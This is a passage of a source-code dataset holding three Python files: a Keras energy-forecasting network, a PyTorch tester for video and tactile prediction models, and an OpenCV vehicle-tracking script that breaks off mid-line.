max_value=config.neuron_shrink_max,\n            sampling=config.neuron_shrink_sampling,\n        )\n        hp_max_neurons = hp.Int(\n            \"neurons\",\n            min_value=config.neurons_min,\n            max_value=config.neurons_max,\n            step=config.neurons_step,\n        )\n\n        neuron_count = int(hp_neuron_pct * hp_max_neurons)\n        layers = 0\n\n        model = Sequential()\n\n        while neuron_count > 5 and layers < 5:\n            model.add(Dense(units=neuron_count, activation=hp_activation))\n            model.add(Dropout(hp_dropout))\n            layers += 1\n            neuron_count = int(neuron_count * hp_neuron_shrink)\n\n        model.add(Dense(1, \"linear\"))\n\n        model.compile(\n            loss=MeanSquaredError(),\n            optimizer=Adam(learning_rate=hp_learning_rate),\n            metrics=[\n                \"mean_squared_error\",\n                \"mean_absolute_error\",\n                \"mean_absolute_percentage_error\",\n            ],\n        )\n\n        return model\n\n    def train(\n        self,\n        X_train,\n        y_train,\n        y_scaler,\n        config: BasicNNConfig,\n    ):\n        \"\"\"\n        Train the model\n\n        :param X_train: _description_\n        :param y_train: _description_\n        
:param y_scaler: _description_\n :param config: _description_\n \"\"\"\n tuner = kt.Hyperband(\n BasicNNModel.kt_model,\n objective=\"mean_absolute_percentage_error\",\n max_epochs=config.epochs,\n factor=3,\n directory=config.model_directory / (config.set_name + \"_kt_dir\"),\n project_name=\"kt_model_\" + str(config.future),\n overwrite=True,\n )\n\n monitor = EarlyStopping(\n monitor=\"mean_absolute_percentage_error\",\n min_delta=1,\n patience=5,\n verbose=0,\n mode=\"auto\",\n restore_best_weights=True,\n )\n\n tuner.search(\n X_train,\n y_train,\n verbose=0,\n epochs=config.epochs,\n validation_split=0.2,\n batch_size=config.batch_size,\n callbacks=[monitor],\n )\n\n best_hps = tuner.get_best_hyperparameters(num_trials=1)[0]\n model = tuner.hypermodel.build(best_hps)\n\n # Split on a 3 monthly basis\n tss = TimeSeriesSplit(n_splits=10, test_size=config.epd * 90, gap=0)\n fold = 0\n total_metrics = {}\n\n for train_idx, val_idx in tss.split(X_train, y_train):\n fold_name = \"Fold_\" + str(fold)\n X_t = X_train[train_idx]\n X_v = X_train[val_idx]\n y_t = y_train[train_idx]\n y_v = y_train[val_idx]\n\n if fold == 9:\n history = model.fit(\n X_t,\n y_t,\n verbose=0,\n epochs=config.epochs,\n callbacks=[monitor],\n batch_size=config.batch_size,\n validation_data=(X_v, y_v),\n )\n graphs_directory = os.getcwd() + \"/graphs\"\n self.save_plots(\n history, graphs_directory, config.set_name, config.future\n )\n model.save(\n config.model_directory\n / (f\"{config.set_name}_{self.MODEL_NAME.lower()}_{config.future}\")\n )\n\n model.fit(\n X_t,\n y_t,\n verbose=0,\n epochs=config.epochs,\n callbacks=[monitor],\n batch_size=config.batch_size,\n )\n preds = model.predict(X_v, verbose=0)\n preds = y_scaler.inverse_transform(preds)\n metrics = get_metrics(preds, y_v, 1, self.MODEL_NAME)\n total_metrics[fold_name] = metrics\n\n fold += 1\n\n cross_val_metrics(\n total_metrics,\n config.set_name,\n config.future,\n self.MODEL_NAME,\n )\n\n def predict(self, model, X_test, y_test, y_scaler, config: BasicNNConfig):\n \"\"\"\n _description_\n\n :param model: _description_\n :param X_test: _description_\n :param y_test: _description_\n :param y_scaler: _description_\n :param config: _description_\n :return: _description_\n \"\"\"\n folder_path = os.getcwd()\n model_directory = folder_path + r\"\\models\"\n csv_directory = folder_path + r\"\\csvs\"\n\n model = load_model(\n f\"{model_directory}/{config.set_name}_{self.MODEL_NAME.lower()}_{config.future}\"\n )\n predictions = model.predict(X_test)\n predictions = y_scaler.inverse_transform(predictions).reshape(-1)\n y_test = y_scaler.inverse_transform(y_test).reshape(-1)\n\n # MA: Not sure if this is right, but could use something like this to get the dates\n pred_dates_test = X_test.index.dt.strftime(\"%Y-%m-%d\").values\n\n make_csvs(\n csv_directory,\n predictions,\n y_test,\n pred_dates_test,\n config.set_name,\n config.future,\n self.MODEL_NAME,\n )\n\n print(\n \"Finished running basic prediction on future window {0}\".format(\n config.future\n )\n )\n\n metric_outputs = get_metrics(predictions, y_test, 0, self.MODEL_NAME)\n return metric_outputs\n\n def evaluate(self, X_train, y_train, y_scaler, config: BasicNNConfig):\n \"\"\"\n _description_\n\n :param X_train: _description_\n :param y_train: _description_\n :param y_scaler: _description_\n :param config: _description_\n :return: _description_\n \"\"\"\n time_start = time.time()\n\n absl.logging.set_verbosity(absl.logging.ERROR)\n tf.compat.v1.logging.set_verbosity(30)\n\n self.train(X_train, 
y_train, y_scaler, config)\n\n print(f\"Finished evaluating basic nn for future {config.future}\")\n\n time_end = time.time()\n\n return time_end - time_start\n\n def save_plots(self, history, config: BasicNNConfig):\n \"\"\"\n _description_\n\n :param history: _description_\n :type history: _type_\n :param graphs_directory: _description_\n :type graphs_directory: _type_\n :param set_name: _description_\n :type set_name: _type_\n :param future: _description_\n :type future: _type_\n \"\"\"\n graph_names = {\n \"Loss\": \"loss\",\n \"MAE\": \"mean_absolute_error\",\n \"MSE\": \"mean_squared_error\",\n \"MAPE\": \"mean_absolute_percentage_error\",\n }\n\n for name, value in graph_names.items():\n graph_loc = f\"{config.graphs_directory}/{config.set_name}_{self.MODEL_NAME}_{config.future}_{name}.png\"\n if os.path.exists(graph_loc):\n os.remove(graph_loc)\n\n val_name = \"val_\" + value\n plt.plot(history.history[value])\n plt.plot(history.history[val_name])\n plt.title(f\"Basic NN {name} for {config.set_name} {config.future}\")\n plt.ylabel(name)\n plt.xlabel(\"epoch\")\n plt.legend([\"train\", \"test\"], loc=\"upper left\")\n plt.savefig(graph_loc)\n","repo_name":"MattAmos/Energy-Forecasting","sub_path":"src/models/basic_nn.py","file_name":"basic_nn.py","file_ext":"py","file_size_in_byte":9004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"38684904605","text":"# -*- coding: utf-8 -*-\n# RUN IN PYTHON 3\nimport os\nimport sys\nimport csv\nimport cv2\nimport click\nimport random\nimport numpy as np\nfrom PIL import Image\nfrom matplotlib import pyplot as plt\n\n\nfrom tqdm import tqdm\nfrom datetime import datetime\nfrom torch.utils.data import Dataset\n\nimport torch\nimport torch.nn as nn\nimport torchvision\n\n# standard video and tactile prediction models:\nfrom universal_networks.SVG import Model as SVG\nfrom universal_networks.SVTG_SE import Model as SVTG_SE\nfrom universal_networks.SVG_MMFM import Model as SVG_MMFM\nfrom universal_networks.SPOTS_SVG_ACTP import Model as SPOTS_SVG_ACTP\nfrom universal_networks.SPOTS_SVG_ACTP_STP import Model as SPOTS_SVG_ACTP_STP\nfrom universal_networks.SPOTS_SVG_ACTP_STP_SAMESIZE import Model as SPOTS_SVG_ACTP_STP_SAMESIZE\n\n# Tactile enhanced models:\nfrom universal_networks.SVG_TE import Model as SVG_TE\n\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport numpy as np\nfrom math import exp\n\nclass PSNR:\n \"\"\"Peak Signal to Noise Ratio\n img1 and img2 have range [0, 255]\"\"\"\n\n def __init__(self):\n self.name = \"PSNR\"\n\n @staticmethod\n def __call__(img1, img2):\n mse = torch.mean((img1 - img2) ** 2)\n return 20 * torch.log10(255.0 / torch.sqrt(mse))\n\ndef gaussian(window_size, sigma):\n gauss = torch.Tensor([exp(-(x - window_size // 2) ** 2 / float(2 * sigma ** 2)) for x in range(window_size)])\n return gauss / gauss.sum()\n\ndef create_window(window_size, channel):\n _1D_window = gaussian(window_size, 1.5).unsqueeze(1)\n _2D_window = _1D_window.mm(_1D_window.t()).float().unsqueeze (0).unsqueeze (0)\n window = Variable (_2D_window.expand (channel, 1, window_size, window_size).contiguous ())\n return window\n\ndef _ssim(img1, img2, window, window_size, channel, size_average=True):\n mu1 = F.conv2d (img1, window, padding=window_size // 2, groups=channel)\n mu2 = F.conv2d (img2, window, padding=window_size // 2, groups=channel)\n\n mu1_sq = mu1.pow (2)\n mu2_sq = mu2.pow (2)\n mu1_mu2 = mu1 * mu2\n\n sigma1_sq = F.conv2d (img1 * img1, window, 
padding=window_size // 2, groups=channel) - mu1_sq\n sigma2_sq = F.conv2d (img2 * img2, window, padding=window_size // 2, groups=channel) - mu2_sq\n sigma12 = F.conv2d (img1 * img2, window, padding=window_size // 2, groups=channel) - mu1_mu2\n\n C1 = 0.01 ** 2\n C2 = 0.03 ** 2\n\n ssim_map = ((2 * mu1_mu2 + C1) * (2 * sigma12 + C2)) / ((mu1_sq + mu2_sq + C1) * (sigma1_sq + sigma2_sq + C2))\n\n if size_average:\n return ssim_map.mean ()\n else:\n return ssim_map.mean (1).mean (1).mean (1)\n\nclass SSIM (torch.nn.Module):\n def __init__(self, window_size=11, size_average=True):\n super (SSIM, self).__init__ ()\n self.window_size = window_size\n self.size_average = size_average\n self.channel = 1\n self.window = create_window (window_size, self.channel)\n\n def forward(self, img1, img2):\n (_, channel, _, _) = img1.size()\n\n if channel == self.channel and self.window.data.type () == img1.data.type ():\n window = self.window\n else:\n window = create_window (self.window_size, channel)\n\n if img1.is_cuda:\n window = window.cuda (img1.get_device ())\n window = window.type_as (img1)\n\n self.window = window\n self.channel = channel\n\n return _ssim (img1, img2, window, self.window_size, channel, self.size_average)\n\ndef ssim(img1, img2, window_size=11, size_average=True):\n (_, channel, _, _) = img1.size ()\n window = create_window (window_size, channel)\n\n if img1.is_cuda:\n window = window.cuda (img1.get_device ())\n window = window.type_as (img1)\n\n return _ssim (img1, img2, window, window_size, channel, size_average)\n\nclass BatchGenerator:\n def __init__(self, batch_size, image_width, features):\n self.batch_size = batch_size\n self.image_size = image_width\n self.features = features\n\n def load_full_data(self):\n dataset_test = FullDataSet(self.features)\n test_loader = torch.utils.data.DataLoader(dataset_test, batch_size=self.batch_size, shuffle=False)\n self.data_map = []\n return test_loader\n\nclass FullDataSet(torch.utils.data.Dataset):\n def __init__(self, features):\n self.features = features\n self.samples = data_map[1:]\n\n def __len__(self):\n return len(self.samples)\n\n def __getitem__(self, idx):\n value = self.samples[idx]\n robot = np.load(tdd + value[0]).astype(np.float32)\n\n if uti == True:\n tactile = np.load(tdd + value[2]).astype(np.float32)\n else:\n tactile = np.load(tdd + value[1]).astype(np.float32)\n if tr:\n tactile = np.random.normal(0, 1, tactile.shape).astype(np.float32)\n tactile = (tactile - tactile.min()) / (tactile.max() - tactile.min())\n # tactile[:self.features[\"n_past\"]] = 0.0\n if tz:\n tactile[:] = 0.5 \n\n image = []\n for image_name in np.load(tdd + value[3]):\n if udd:\n image.append(np.load(tdd + image_name).astype(np.float32))\n else:\n image.append(np.load(tdd + image_name).astype(np.float32)[:, :, 0:3])\n image= np.array(image)\n if ir:\n image[:self.features[\"n_past\"]] = 0.0\n if iz:\n image[:] = 0.5\n\n return [torch.tensor(robot), torch.tensor(image), torch.tensor(tactile)]\n\n\nclass UniversalTester:\n def __init__(self, features):\n self.list_of_p_measures = [\"MAE\", \"MSE\", \"PSNR\", \"SSIM\", \"MAE_last\", \"MSE_last\", \"PSNR_last\", \"SSIM_last\"]\n\n saved_model = torch.load(features[\"model_save_path\"] + features[\"model_save_name\"] + features[\"model_name_save_appendix\"])\n self.features = saved_model['features']\n\n if features[\"model_name\"] == \"SVG\": self.model = SVG(features = self.features)\n elif features[\"model_name\"] == \"SVTG_SE\": self.model = SVTG_SE(features = self.features)\n elif 
features[\"model_name\"] == \"SVG_MMFM\": self.model = SVG_MMFM(features = self.features)\n elif features[\"model_name\"] == \"SPOTS_SVG_ACTP\": self.model = SPOTS_SVG_ACTP(features = self.features)\n elif features[\"model_name\"] == \"SVG_TE\": self.model = SVG_TE(features = self.features)\n elif features[\"model_name\"] == \"SPOTS_SVG_ACTP_STP\": self.model = SPOTS_SVG_ACTP_STP(features = self.features)\n elif features[\"model_name\"] == \"SPOTS_SVG_ACTP_STP_SAMESIZE\": self.model = SPOTS_SVG_ACTP_STP_SAMESIZE(features = self.features)\n\n self.test_features = features\n self.model.load_model(full_model=saved_model)\n saved_model = None\n\n BG = BatchGenerator(self.features[\"batch_size\"], self.features[\"image_width\"], self.features)\n self.test_full_loader = BG.load_full_data()\n\n self.test_model()\n\n def test_model(self):\n batch_losses = []\n batch_tactile_losses = []\n self.model.set_test()\n for index, batch_features in enumerate(self.test_full_loader):\n print(str(index) + \"\\r\")\n\n groundtruth_scene, predictions_scene, groundtruth_tactile, prediction_tactile = self.format_and_run_batch(batch_features, test=True) # run the model\n if self.test_features[\"quant_analysis\"] == True: # and prediction_tactile == 100:\n batch_losses.append(self.calculate_scores(predictions_scene, groundtruth_scene[self.features[\"n_past\"]:], prediction_tactile))\n if self.test_features[\"quant_tactile_analysis\"] == True:\n print(groundtruth_tactile)\n batch_tactile_losses.append(self.calculate_tactile_scores(prediction_tactile, groundtruth_tactile[self.features[\"n_past\"]]))\n\n batches_to_save = [0,1,2,3]\n if self.test_features[\"qual_analysis\"] == True and index in batches_to_save:\n print(\"here, index: \" + str(index))\n self.save_images(predictions_scene, groundtruth_scene[self.features[\"n_past\"]:], index)\n \n if self.test_features[\"qual_tactile_analysis\"] == True and index in batches_to_save:\n self.save_tactile(prediction_tactile, groundtruth_tactile[self.features[\"n_past\"]:], index)\n\n if self.test_features[\"quant_analysis\"] == True:\n print(batch_losses)\n batch_losses = np.array(batch_losses)\n \n if self.test_features[\"seen\"]: data_save_path_append = \"seen_\"\n else: data_save_path_append = \"unseen_\"\n\n np.save(self.test_features[\"data_save_path\"] + data_save_path_append + \"test_loss_scores_alltimesteps.npy\", batch_losses)\n lines = [[float(i) for i in j] for j in batch_losses[0][2]]\n with open (self.test_features[\"data_save_path\"] + data_save_path_append + \"test_loss_scores_alltimesteps.txt\", 'w') as f:\n for index, line in enumerate(lines):\n f.write(self.list_of_p_measures[index] + \": \" + str(line))\n f.write('\\n')\n\n full_losses = [sum(batch_losses[:,0,i]) / batch_losses.shape[0] for i in range(batch_losses.shape[2])]\n last_ts_losses = [sum(batch_losses[:,1,i]) / batch_losses.shape[0] for i in range(batch_losses.shape[2])]\n\n full_losses = [float(i) for i in full_losses]\n last_ts_losses = [float(i) for i in last_ts_losses]\n\n np.save(self.test_features[\"data_save_path\"] + data_save_path_append + \"test_loss_scores.npy\", batch_losses)\n lines = full_losses + last_ts_losses\n with open (self.test_features[\"data_save_path\"] + data_save_path_append + \"test_loss_scores.txt\", 'w') as f:\n for index, line in enumerate(lines):\n f.write(self.list_of_p_measures[index] + \": \" + str(line))\n f.write('\\n')\n\n if self.test_features[\"quant_tactile_analysis\"] == True:\n print(batch_tactile_losses)\n batch_tactile_losses = 
np.array(batch_tactile_losses)\n\n if self.test_features[\"seen\"]: data_save_path_append = \"seen_\"\n else: data_save_path_append = \"unseen_\"\n\n np.save(self.test_features[\"data_save_path\"] + data_save_path_append + \"test_tactile_loss_scores_alltimesteps.npy\", batch_tactile_losses)\n lines = [[float(i) for i in j] for j in batch_tactile_losses[0][2]]\n with open (self.test_features[\"data_save_path\"] + data_save_path_append + \"test_tactile_loss_scores_alltimesteps.txt\", 'w') as f:\n for index, line in enumerate(lines):\n f.write(self.list_of_p_measures[index] + \": \" + str(line))\n f.write('\\n')\n\n full_losses = [sum(batch_tactile_losses[:,0,i]) / batch_tactile_losses.shape[0] for i in range(batch_tactile_losses.shape[2])]\n last_ts_losses = [sum(batch_tactile_losses[:,1,i]) / batch_tactile_losses.shape[0] for i in range(batch_tactile_losses.shape[2])]\n\n full_losses = [float(i) for i in full_losses]\n last_ts_losses = [float(i) for i in last_ts_losses]\n\n np.save(self.test_features[\"data_save_path\"] + data_save_path_append + \"test_tactile_loss_scores.npy\", batch_tactile_losses)\n lines = full_losses + last_ts_losses\n with open (self.test_features[\"data_save_path\"] + data_save_path_append + \"test_tactile_loss_scores.txt\", 'w') as f:\n for index, line in enumerate(lines):\n f.write(self.list_of_p_measures[index] + \": \" + str(line))\n f.write('\\n')\n\n\n def save_tactile(self, prediction_tactile, groundtruth_tactile, index):\n try:\n os.mkdir(self.test_features[\"data_save_path\"] + \"push_\" + str(index))\n except FileExistsError or FileNotFoundError:\n pass\n\n predictions_tactile = prediction_tactile.cpu().detach().numpy()\n groundtruth_tactile = groundtruth_tactile.cpu().detach().numpy()\n\n for j in range(0, predictions_tactile.shape[1]):\n for i in range(0, predictions_tactile.shape[0]):\n np.save(self.test_features[\"data_save_path\"] + \"push_\" + str(index) + \"/PR_tactile_batch_\" + str(j) + \"_timestep_\" + str(i) + \".npy\", predictions_tactile[i,j])\n np.save(self.test_features[\"data_save_path\"] + \"push_\" + str(index) + \"/GT_tactile_batch_\" + str(j) + \"_timestep_\" + str(i) + \".npy\", groundtruth_tactile[i,j])\n\n def save_images(self, predictions_scene, groundtruth_scene, index):\n save_location = self.test_features[\"data_save_path\"] + \"push_\" + str(index)\n try:\n os.mkdir(save_location)\n except FileExistsError or FileNotFoundError:\n print(\"Directory already exists: \", save_location)\n pass\n\n predictions_scene = predictions_scene.cpu().detach().numpy()\n groundtruth_scene = groundtruth_scene.cpu().detach().numpy()\n for j in range(0, predictions_scene.shape[1]):\n for i in range(0, predictions_scene.shape[0]):\n im = predictions_scene[i][j].T * 255\n im = Image.fromarray(im[:,:,::-1].astype(np.uint8))\n im.save(save_location + \"/PR_batch_\" + str(j) + \"_timestep_\" + str(i) + \".png\")\n\n im = groundtruth_scene[i][j].T * 255\n im = Image.fromarray(im[:,:,::-1].astype(np.uint8))\n im.save(save_location + \"/GT_batch_\" + str(j) + \"_timestep_\" + str(i) + \".png\")\n\n def calculate_tactile_scores(self, prediction_tactile, groundtruth_tactile):\n tactile_losses_full, tactile_losses_last, tactile_losses_alltimesteps = [],[],[]\n for criterion in [nn.L1Loss(), nn.MSELoss()]: #, PSNR(), SSIM(window_size=self.features[\"image_width\"])]:\n tactile_batch_loss_full = []\n for i in range(prediction_tactile.shape[0]):\n tactile_batch_loss_full.append(criterion(prediction_tactile[i], groundtruth_tactile[i]).cpu().detach().data)\n\n 
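# for each criterion, keep the full per-timestep list, its mean, and the final timestep's loss\n            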
tactile_losses_alltimesteps.append(tactile_batch_loss_full)\n tactile_losses_full.append(sum(tactile_batch_loss_full) / len(tactile_batch_loss_full))\n tactile_losses_last.append(tactile_batch_loss_full[-1])\n\n return tactile_losses_full, tactile_losses_last, tactile_losses_alltimesteps\n\n def calculate_scores(self, prediction_scene, groundtruth_scene, prediction_tactile=None, groundtruth_tactile=None):\n scene_losses_full, scene_losses_last, scene_losses_alltimesteps = [],[],[]\n for criterion in [nn.L1Loss(), nn.MSELoss(), PSNR(), SSIM(window_size=self.features[\"image_width\"])]: #, SSIM(window_size=self.image_width)]:\n scene_batch_loss_full = []\n for i in range(prediction_scene.shape[0]):\n scene_batch_loss_full.append(criterion(prediction_scene[i], groundtruth_scene[i]).cpu().detach().data)\n\n scene_losses_alltimesteps.append(scene_batch_loss_full)\n scene_losses_full.append(sum(scene_batch_loss_full) / len(scene_batch_loss_full))\n scene_losses_last.append(criterion(prediction_scene[-1], groundtruth_scene[-1]).cpu().detach().data) # t+5\n\n return [scene_losses_full, scene_losses_last, scene_losses_alltimesteps]\n\n def format_and_run_batch(self, batch_features, test):\n # # \"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\" REMOVE THIS !!!!!!!!!\n self.features[\"n_eval\"] = 17\n # # \"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\" REMOVE THIS !!!!!!!!!\n\n cut_required = False\n if batch_features[1].shape[0] != self.features[\"batch_size\"]:\n cut_required = batch_features[1].shape[0]\n # add zeros of the data to reach the batch_size:\n if self.features[\"using_tactile_images\"]:\n batch_features[2] = torch.cat((batch_features[2], torch.zeros(self.features[\"batch_size\"] - batch_features[2].shape[0], self.features[\"n_eval\"], self.features[\"image_width\"], self.features[\"image_width\"], int(self.features[\"channels\"] / 2))), dim=0)\n batch_features[1] = torch.cat((batch_features[1], torch.zeros(self.features[\"batch_size\"] - batch_features[1].shape[0], self.features[\"n_eval\"], self.features[\"image_width\"], self.features[\"image_width\"], int(self.features[\"channels\"] / 2))), dim=0)\n else:\n batch_features[2] = torch.cat((batch_features[2], torch.zeros(self.features[\"batch_size\"] - batch_features[2].shape[0], self.features[\"n_eval\"], batch_features[2].shape[2], batch_features[2].shape[3])), dim=0)\n batch_features[1] = torch.cat((batch_features[1], torch.zeros(self.features[\"batch_size\"] - batch_features[1].shape[0], self.features[\"n_eval\"], self.features[\"image_width\"], self.features[\"image_width\"], self.features[\"channels\"])), dim=0)\n batch_features[0] = torch.cat((batch_features[0], torch.zeros(self.features[\"batch_size\"] - batch_features[0].shape[0], self.features[\"n_eval\"], int(self.features[\"state_action_size\"] / 2))), dim=0)\n\n \n mae, kld, mae_tactile, predictions = 100, 100, 100, 100\n tactile_predictions, tactile = 100, 100\n if self.features[\"model_name\"] == \"SVG\" or self.features[\"model_name\"] == \"SVG_MMFM\":\n images = batch_features[1].permute(1, 0, 4, 3, 2).to(self.features[\"device\"])\n action = batch_features[0].squeeze(-1).permute(1, 0, 2).to(self.features[\"device\"])\n mae, kld, predictions = self.model.run(scene=images, actions=action, test=test)\n\n elif self.features[\"model_name\"] == \"SVTG_SE\":\n images = batch_features[1].permute(1, 0, 4, 3, 2).to(self.features[\"device\"])\n tactile = batch_features[2].permute(1, 0, 4, 3, 2).to(self.features[\"device\"])\n action = batch_features[0].squeeze(-1).permute(1, 
0, 2).to(self.features[\"device\"])\n scene_and_touch = torch.cat((tactile, images), 2)\n mae, kld, predictions = self.model.run(scene_and_touch=scene_and_touch, actions=action, test=test)\n predictions = predictions[:,:,3:6,:,:]\n tactile_predictions = predictions[:,:,0:3,:,:]\n\n elif self.features[\"model_name\"] == \"SPOTS_SVG_ACTP\" or self.features[\"model_name\"] == \"SPOTS_SVG_ACTP_STP\" or self.features[\"model_name\"] == \"SPOTS_SVG_ACTP_STP_SAMESIZE\":\n action = batch_features[0].squeeze(-1).permute(1, 0, 2).to(self.features[\"device\"])\n images = batch_features[1].permute(1, 0, 4, 3, 2).to(self.features[\"device\"])\n tactile = torch.flatten(batch_features[2].permute(1, 0, 2, 3), start_dim=2).to(self.features[\"device\"])\n mae, kld, mae_tactile, predictions, tactile_predictions = self.model.run(scene=images, tactile=tactile, actions=action, gain=0, test=test, stage=\"\")\n\n elif self.features[\"model_name\"] == \"SVG_TE\":\n images = batch_features[1].permute(1, 0, 4, 3, 2).to(self.features[\"device\"])\n tactile = torch.flatten(batch_features[2].permute(1, 0, 2, 3), start_dim=2).to(self.features[\"device\"])\n action = batch_features[0].squeeze(-1).permute(1, 0, 2).to(self.features[\"device\"])\n mae, kld, predictions = self.model.run(scene=images, tactile=tactile, actions=action, gain=0, test=test)\n\n if cut_required:\n predictions = predictions[:, :cut_required]\n images = images[:,:cut_required]\n if self.features[\"model_name\"] == \"SPOTS_SVG_ACTP\" or self.features[\"model_name\"] == \"SPOTS_SVG_ACTP_STP\" or self.features[\"model_name\"] == \"SPOTS_SVG_ACTP_STP_SAMESIZE\":\n tactile = tactile[:cut_required]\n if self.features[\"model_name\"] == \"SVTG_SE\":\n tactile = tactile[:cut_required]\n\n return images, predictions, tactile, tactile_predictions\n\n\n@click.command()\n@click.option('--model_name', type=click.Path(), default = \"SVG\", help='Set name for prediction model, SVG, SVTG_SE, SVG_TC, SVG_TC_TE, SPOTS_SVG_ACTP')\n@click.option('--model_stage', type=click.Path(), default = \"\", help='what stage of model should you test? 
BEST, stage1 etc.')\n@click.option('--tactile_random', type=click.BOOL, default = False, help='if you want to provide random tactile data to the model instead of real tactile data')\n@click.option('--tactile_zero', type=click.BOOL, default = False, help='if you want to provide zeroed tactile data to the model instead of real tactile data')\n@click.option('--image_zero', type=click.BOOL, default = False, help='if you want to provide neutral image data to the model instead of the real image data')\n@click.option('--image_random', type=click.BOOL, default = False, help='if you want to provide random scene data to the model instead of real scene data')\n@click.option('--model_folder_name', type=click.Path(), default = \"/home/willow/Robotics/SPOTS/models/saved_models/SVG/marked_object_dataset/model_12_11_2022_17_18/\", help='Folder name where the model is stored')\n@click.option('--quant_analysis', type=click.BOOL, default = True, help='Perform quantitative analysis on the test data')\n@click.option('--qual_analysis', type=click.BOOL, default = False, help='Perform qualitative analysis on the test data')\n@click.option('--qual_tactile_analysis', type=click.BOOL, default = False, help='Perform qualitative analysis on the test tactile data')\n@click.option('--quant_tactile_analysis', type=click.BOOL, default = False, help='Perform quantitative analysis on the test tactile data')\n@click.option('--test_sample_time_step', type=click.Path(), default = \"[1, 2, 10]\", help='which time steps in prediction sequence to calculate performance metrics for.')\n@click.option('--model_name_save_appendix', type=click.Path(), default = \"\", help = \"What to add to the save file to identify the model as a specific subset, _1c\")\n@click.option('--test_data_dir', type=click.Path(), default = \"/home/willow/Robotics/datasets/PRI/MarkedHeavyBox/Dataset_2c_15p/\", help = \"Directory containing the formatted test dataset\")\n@click.option('--scaler_dir', type=click.Path(), default = \"/home/willow/Robotics/datasets/PRI/MarkedHeavyBox/Dataset_2c_5p/scalar/\", help = \"Directory containing the dataset scalers\")\n@click.option('--using_tactile_images', type=click.BOOL, default = False, help = \"Whether the tactile data is stored as images rather than flat vectors\")\n@click.option('--using_depth_data', type=click.BOOL, default = False, help = \"Whether the dataset includes depth data\")\n@click.option('--seen', type=click.BOOL, default = False, help = \"Test on objects seen during training (True) or unseen objects (False)\")\n@click.option('--device', type=click.Path(), default = \"cuda:1\", help = \"Device to run the model on, e.g. cuda:1 or cpu\")\ndef main(model_name, model_stage, tactile_random, tactile_zero, image_zero, image_random, model_folder_name, quant_analysis, qual_analysis, qual_tactile_analysis, quant_tactile_analysis, test_sample_time_step, model_name_save_appendix, test_data_dir, scaler_dir, using_tactile_images, using_depth_data, seen, device):\n    model_save_path = model_folder_name\n    if tactile_random:\n        data_save_path = model_save_path + \"performance_data_tactile_random/\"\n    elif image_random:\n        data_save_path = model_save_path + \"performance_data_image_random/\"\n    elif image_zero:\n        data_save_path = model_save_path + \"performance_data_image_zero_17/\"\n    elif tactile_zero:\n        data_save_path = 
model_save_path + \"performance_data_tactile_zero_17/\"\n else:\n data_save_path = model_save_path + \"performance_data_17/\"\n\n model_save_name = model_name + \"_model\"\n\n if \"household_object_dataset\" in test_data_dir:\n if seen:\n test_data_dir += \"test_seen_formatted/\"\n else:\n test_data_dir += \"test_unseen_formatted/\"\n elif \"MarkedHeavyBox\" in test_data_dir:\n if seen:\n test_data_dir += \"test_formatted/\"\n else:\n test_data_dir += \"test_examples_formatted/\"\n\n try:\n os.mkdir(data_save_path)\n except FileExistsError or FileNotFoundError:\n pass\n\n print(model_save_name)\n\n global tz\n global tr\n global data_map\n global tdd\n global uti\n global udd\n global ir\n global iz\n data_map = []\n tdd = test_data_dir\n uti = using_tactile_images\n udd = using_depth_data\n tr = tactile_random\n tz = tactile_zero\n ir = image_random\n iz = image_zero\n\n with open(test_data_dir + 'map.csv', 'r') as f: # rb\n reader = csv.reader(f)\n for index, row in enumerate(reader):\n data_map.append(row)\n\n features = {\"model_name\":model_name, \"model_stage\":model_stage, \"model_folder_name\":model_folder_name,\n \"quant_analysis\":quant_analysis, \"qual_analysis\":qual_analysis, \"model_save_name\":model_save_name,\n \"qual_tactile_analysis\":qual_tactile_analysis, \"quant_tactile_analysis\":quant_tactile_analysis, \"test_sample_time_step\":test_sample_time_step,\n \"model_name_save_appendix\":model_name_save_appendix, \"test_data_dir\":test_data_dir, \"scaler_dir\":scaler_dir,\n \"using_tactile_images\":using_tactile_images, \"using_depth_data\":using_depth_data, \"model_save_path\":model_save_path,\n \"data_save_path\": data_save_path, \"seen\": seen, \"device\": device, \"tactile_random\": tactile_random, \n \"image_random\": image_random, \"image_zero\": image_zero}\n\n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.deterministic = True\n # device = torch.device(\"cuda:1\" if torch.cuda.is_available() else \"cpu\") # use gpu if available\n\n MT = UniversalTester(features)\n\n\nif __name__ == '__main__':\n log_fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n main()\n","repo_name":"WillMandil001/inverted_pendulum","sub_path":"models/model_tester.py","file_name":"model_tester.py","file_ext":"py","file_size_in_byte":26403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"40935842884","text":"import cv2\nfrom tracker import *\n\ncapt = cv2.VideoCapture(\"rodovia.mp4\")\n\ntracker = EuclideanDistTracker()\n\n# Encontrar objetos se movendo em fundo estatico\n\nencontrar_objeto = cv2.createBackgroundSubtractorMOG2(history=100, varThreshold=40)\nwhile True:\n ret, quad = capt.read()\n height, width, _ = quad.shape\n\n # Mostrar apenas a area de interesse\n\n roi = quad[200: 700,500: 1000]\n\n mascara = encontrar_objeto.apply(roi)\n _, mascara = cv2.threshold(mascara, 254, 255, cv2.THRESH_BINARY)\n contours, _ = cv2.findContours(mascara, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n detections = []\n for cnt in contours:\n # Calcular a area e retirar objetos indesejaveis\n area = cv2.contourArea(cnt)\n if area > 100:\n #cv2.drawContours(roi, [cnt], -1, (0, 255, 0), 2)\n x, y, w, h = cv2.boundingRect(cnt)\n\n\n detections.append([x, y, w, h])\n\n# Rastreamento do objeto\n\n caixas_ids = tracker.update(detections)\n for caixas_ids in caixas_ids:\n x, y, w, h, id = caixas_ids\n cv2.putText(roi, str(id), (x, y-15), cv2.FONT_HERSHEY_PLAIN, 2, (255, 0, 0), 2)\n cv2.rectangle(roi, (x, y), (x + w, y + h), (0, 
